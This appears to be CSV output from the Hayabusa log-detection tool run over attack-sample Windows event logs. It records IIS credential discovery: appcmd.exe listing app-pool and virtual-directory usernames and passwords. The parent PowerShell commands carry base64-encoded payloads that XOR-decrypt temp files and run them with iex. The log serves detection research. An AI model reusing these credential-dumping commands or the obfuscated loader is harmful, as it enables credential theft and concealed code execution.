gBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.282 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.352 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.432 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.522 +09:00,IEWIN7,1,informational,Process Creation,"Command: 
""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.662 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAH
AAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.742 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". 
)"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.822 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.893 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.973 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.063 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.143 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.233 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.323 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.403 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.473 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS 